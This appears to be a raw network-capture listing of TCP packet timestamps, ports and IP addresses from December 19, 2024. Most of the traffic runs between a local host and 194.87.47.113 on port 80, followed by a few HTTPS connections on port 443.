Dec 19, 2024 08:47:38.295831919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.295919895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.296247005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.296514034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.296722889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.297059059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.297271967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.297386885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.297877073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.298033953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.298074961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.298629999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.298799038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.298842907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.299403906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.299726963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.299851894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.300249100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.300493002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.300591946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.300996065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.301187038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.301254988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.301800966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.301999092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.302099943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.302622080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.302812099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.302931070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.303356886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.303867102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.303929090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.304225922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.304239035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.304327011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.304949999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.305217028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.305264950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.305741072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.305975914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.306021929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.306528091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.306705952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.306797028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.307385921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.307579041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.307650089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.308110952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.308301926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.308345079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.308861971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.309041977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.309103012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.309643984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.310103893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.310159922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.310241938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.310585022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.310717106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.311017990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.311352015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.311424017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.311850071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.312066078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.312139988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.312596083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.312973976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.313039064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.313416958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.313429117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.313487053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.314179897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.315507889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.315521002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.315565109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.315844059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.315881014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.316226959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.316240072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.316313982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.317573071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.318303108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.318461895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.318588018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.318599939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.318677902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.319273949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.319284916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.319335938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.319967031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.319979906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.320135117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.320668936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.320681095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.320755959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.321432114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.321444988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.321499109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.322063923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.322077990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.322134018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.322760105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.322772026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.322890997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.323446035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.323458910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.323589087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.324140072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.324151039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.324243069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.324851990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.325160980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.325212002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.325546026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.325557947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.325651884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.326241016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.326255083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.326327085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.326890945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.327258110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.327334881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.327656031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.327953100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.328007936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.328433037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.328689098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.328763962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.329216003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.329446077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.329572916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.330020905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.330260992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.330348969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.330826998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.331091881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.331149101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.331597090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.331820965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.331877947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.332437992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.332634926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.332775116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.333169937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.333435059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.333528996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.333972931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.334153891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.334233046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.334731102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.387826920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.485600948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.485771894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.485841990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.486160040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.486444950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.486500978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.486681938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.487015009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.487066984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.487385988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.487400055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.487528086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.488177061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.488410950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.488475084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.488976955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.489134073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.489299059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.489739895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.489934921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.490052938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.490554094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.490807056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.490849018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.491328001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.491919994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.491962910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.492157936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.492171049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.492224932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.492911100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.493141890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.493208885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.493689060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.494044065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.494155884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.494471073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.494997978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.495064020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.495260954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.495492935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.495579958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.496068954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.496247053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.496299028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.496839046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.497143030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.497181892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.497639894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.497857094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.498070955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.498442888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.498825073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.498866081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.499269009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.499275923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.499341965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.500053883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.500559092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.500611067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.500761032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.500926971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.500984907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.501215935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.501718998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.501816988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.501931906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.502521038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.502532005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.502549887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.503288031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.503334999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.503560066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.504079103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.504142046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.504301071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.504848003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.504882097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.505137920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.505671024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.505845070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.505858898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.506458044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.506603003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.506639957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.507266045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.507338047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.507457018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.508084059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.508095980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.508119106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.508871078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.508924961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.511225939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.630651951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:44.813711882 CET	49765	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:44.933248043 CET	80	49765	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:44.933398962 CET	49765	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:44.933712959 CET	49765	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:45.053283930 CET	80	49765	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:46.425045013 CET	80	49765	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:46.425287962 CET	80	49765	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:46.425400019 CET	49765	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:46.425774097 CET	49765	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:46.545229912 CET	80	49765	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:47.986614943 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.106206894 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.106342077 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.106890917 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.324528933 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.324565887 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.324594975 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.324634075 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.324687958 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.443428993 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.443475008 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.443511963 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.443521976 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.443551064 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.443553925 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.443571091 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.443579912 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.443602085 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.443608999 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.443633080 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.443636894 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.443666935 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.443682909 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.566536903 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.566567898 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.566596031 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.566620111 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.566648960 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.567182064 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.567270041 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.567300081 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.567317963 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.567334890 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.567349911 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.611263990 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.611484051 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.728713036 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.728846073 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.772567034 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.772701979 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.892353058 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:48.892476082 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:48.936633110 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.096692085 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.096877098 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:49.158381939 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.158516884 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:49.216414928 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.278594017 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.278614998 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.278692961 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.278707027 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.278769970 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:49.279016018 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:50.069487095 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:50.069518089 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:50.069619894 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:50.070090055 CET	49772	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:50.189625978 CET	80	49772	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:52.667157888 CET	49788	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:52.667196989 CET	443	49788	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:52.667308092 CET	49788	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:52.667577982 CET	49788	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:52.667594910 CET	443	49788	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:53.093842983 CET	49790	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.093880892 CET	443	49790	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:53.093961954 CET	49790	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.094672918 CET	49790	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.094687939 CET	443	49790	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:53.156757116 CET	49791	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.156811953 CET	443	49791	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:53.157166958 CET	49791	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.157488108 CET	49791	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.157505989 CET	443	49791	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:53.235352039 CET	49793	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.235383987 CET	443	49793	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:53.235464096 CET	49793	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.235678911 CET	49793	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:53.235692024 CET	443	49793	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.364379883 CET	443	49788	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.364749908 CET	49788	443	192.168.2.7	172.217.19.228
Dec 19, 2024 08:47:54.364769936 CET	443	49788	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.365837097 CET	443	49788	172.217.19.228	192.168.2.7
Dec 19, 2024 08:47:54.365895033 CET	49788	443	192.168.2.7	172.217.19.228
